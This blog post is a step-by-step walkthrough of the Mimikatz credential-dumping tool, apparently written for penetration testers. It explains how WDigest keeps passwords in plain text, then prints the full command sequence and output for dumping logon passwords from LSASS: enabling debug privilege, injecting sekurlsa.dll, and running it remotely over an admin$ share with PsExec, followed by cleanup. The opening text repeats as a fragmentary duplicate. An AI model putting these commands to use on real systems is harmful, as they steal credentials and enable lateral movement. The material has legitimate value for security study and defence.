By Tony Lee.
If you haven't been paying attention, Mimikatz is a slick tool that pulls plain-text passwords out of WDigest (explained below) interfaced through LSASS. There are a few other blogs describing mimikatz on the net, but this will hopefully provide more details about the components involved and ideas on how to use it. The tool itself and the download page is in French, so it makes it “fun” to use if you don’t speak french :)
A couple of things to take into consideration:
The key feature of this tool that sets it apart from other tools is its ability to pull plain-text passwords from the system instead of just password hashes. If your intention is to stay within the Windows environment and pass the hash this may not be that big of a deal. However, if you are exploring the curious case of password reuse across different environments—the plain-text password can be quite useful. For example, you have compromised a “Good for Enterprise” server that has a web interface which is not tied into AD single sign on. It might be useful to have the Good admin’s plain-text password to try against the Good for Enterprise web interface. Additionally, unless you have significant computational power, you may not crack an NTLM password hash—thus pulling the plain-text proves useful once again.
WDigest is a DLL first added in Windows XP that is used to authenticate users against HTTP Digest authentication and Simple Authentication Security Layer (SASL) exchanges. Both of these require the user’s plain-text password in order to derive the key to authenticate—thus why it is stored in plain-text.
![]()
Source: http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx
To run mimikatz you'll need
To enter the interactive command mimikatz command prompt, just launch the executable:
You'll be presented with a banner and a prompt:
Next, we'll need to enable debug mode with the
Then we'll need to inject
Finally, we'll pull any available login passwords using the
You should see one entry for each user. Note the
Running mimikatz remotely, is more or less the same, but if you'll need to establish a connection on the system first. We'll do that here by using the built in Windows
We'll need to map the target remotely in order to copy over
Then just copy over
Finally, we'll use psexec to run mimikatz:
Now at our mimikatz prompt, we can just do the same as if we running it locally:
To delete sekurlsa.dll from the remote system:
Then just double check its not there with:
Finally, we can remove our connection to the server:
![]()
If you haven't been paying attention, Mimikatz is a slick tool that pulls plain-text passwords out of WDigest (explained below) interfaced through LSASS. There are a few other blogs describing mimikatz on the net, but this will hopefully provide more details about the components involved and ideas on how to use it. The tool itself and the download page is in French, so it makes it “fun” to use if you don’t speak french :)
Download
Mimikatz can be downloaded from:A couple of things to take into consideration:
- The tool has 32-bit and 64-bit versions – make sure you pick the correct version (systeminfo is your friend)
- You need to run it as admin (need debug privs)
- Needs a DLL called sekurlsa.dll in order to inject into lsass.exe and dump the hashes in clear text (important to know especially for a remote dumping)
Use Cases
The key feature of this tool that sets it apart from other tools is its ability to pull plain-text passwords from the system instead of just password hashes. If your intention is to stay within the Windows environment and pass the hash this may not be that big of a deal. However, if you are exploring the curious case of password reuse across different environments—the plain-text password can be quite useful. For example, you have compromised a “Good for Enterprise” server that has a web interface which is not tied into AD single sign on. It might be useful to have the Good admin’s plain-text password to try against the Good for Enterprise web interface. Additionally, unless you have significant computational power, you may not crack an NTLM password hash—thus pulling the plain-text proves useful once again.
What the heck is WDigest?
WDigest is a DLL first added in Windows XP that is used to authenticate users against HTTP Digest authentication and Simple Authentication Security Layer (SASL) exchanges. Both of these require the user’s plain-text password in order to derive the key to authenticate—thus why it is stored in plain-text.
Source: http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx
Running mimikatz
To run mimikatz you'll need
mimikatz.exe and sekurlsa.dll on the system you're targeting. Once you launch mimikatz.exe from the command line you'll be provided with an interactive prompt that will allow you to perform a number of different commands. In the next sections we'll go over the following commands:privilege::debuginject::process lsass.exe sekurlsa.dll@getLogonPasswords
Running locally (Windows 2008 R2 – 64-bit)
To enter the interactive command mimikatz command prompt, just launch the executable:
mimikatz.exe
You'll be presented with a banner and a prompt:
C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz #
Next, we'll need to enable debug mode with the
privilege::debug command:mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz #
Then we'll need to inject
sekurlsa.dll into LSASS, but using the inject::process command:mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 448
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz #
Finally, we'll pull any available login passwords using the
@getLogonPasswords macro:mimikatz # @getLogonPasswords
Authentification Id : 0;126660
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : FS
msv1_0 : lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }
wdigest : 1qaz@WSX
tspkg : 1qaz@WSX
--SNIP--
mimikatz # exit
Fermeture du canal de communication
You should see one entry for each user. Note the
msv1_0 and wdigest fields. The former contains the LM and NTLM hashes for the Administrator user (defined by "Utilisateur principal") and the later contains the WDigest entry, which is the plain text password of the user!Running Remotely (Windows 2003 – 32-bit)
Running mimikatz remotely, is more or less the same, but if you'll need to establish a connection on the system first. We'll do that here by using the built in Windows
net commands and psexec. We'll need to map the target remotely in order to copy over
sekurlsa.dll. First we'll establish a connection to the servers admin$ share. Note that this will require pre-existing access to the server, so you'll need a valid credential to map the share:net use \\169.254.73.91\admin$ /u:169.254.73.91\mimidemo
Then just copy over
sekurlsa.dll:C:\Users\Administrator\Desktop\mimikatz_trunk\tools> copy ..\Win32\sekurlsa.dll \\169.254.73.91\admin$\system32
Finally, we'll use psexec to run mimikatz:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz #
Now at our mimikatz prompt, we can just do the same as if we running it locally:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privil+¿ge : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
Attente de connexion du client...
Serveur connect+¬ +á un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donn+¬es de s+¬curit+¬s dans LSASS
mimikatz # @getLogonPasswords
--SNIP--
Authentification Id : 0;184995
Package d'authentification : NTLM
Utilisateur principal : PowerAccnt
Domaine d'authentification : SWITCH
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 37**********************89 }
wdigest : j************************\ <- Service account with Admin Privileges and suuuper long password - Ouch
Authentification Id : 0;62703
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : SWITCH
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 4***************************d }
wdigest : ******************** <- Admin account with suuuper long password - Ouch
--SNIP--
mimikatz # exit
Fermeture du canal de communication
Cleanup
To delete sekurlsa.dll from the remote system:
del \\169.254.73.91\admin$\system32\sekurlsa.dll
Then just double check its not there with:
dir \\169.254.73.91\admin$\system32\sekurlsa.dll
Volume in drive \\169.254.73.91\admin$ has no label.
Volume Serial Number is 34C7-0000
Directory of \\169.254.73.91\admin$\system32
File Not Found
Finally, we can remove our connection to the server:
net use \\169.254.73.91\admin$ /del
\\169.254.73.91\admin$ was deleted successfully.
Final Thoughts
Insanely awesome tool--huge thanks to the author for sharing! This capability can be instrumental in leveraging password reuse. This makes another tool to add to the security toolbox for sure. Also note that Hernan Ochoa added this capability to Windows Credential Editor version 1.3 Beta using the "-w" flag.Got some tips of your own? Let us know in the comments below!!!
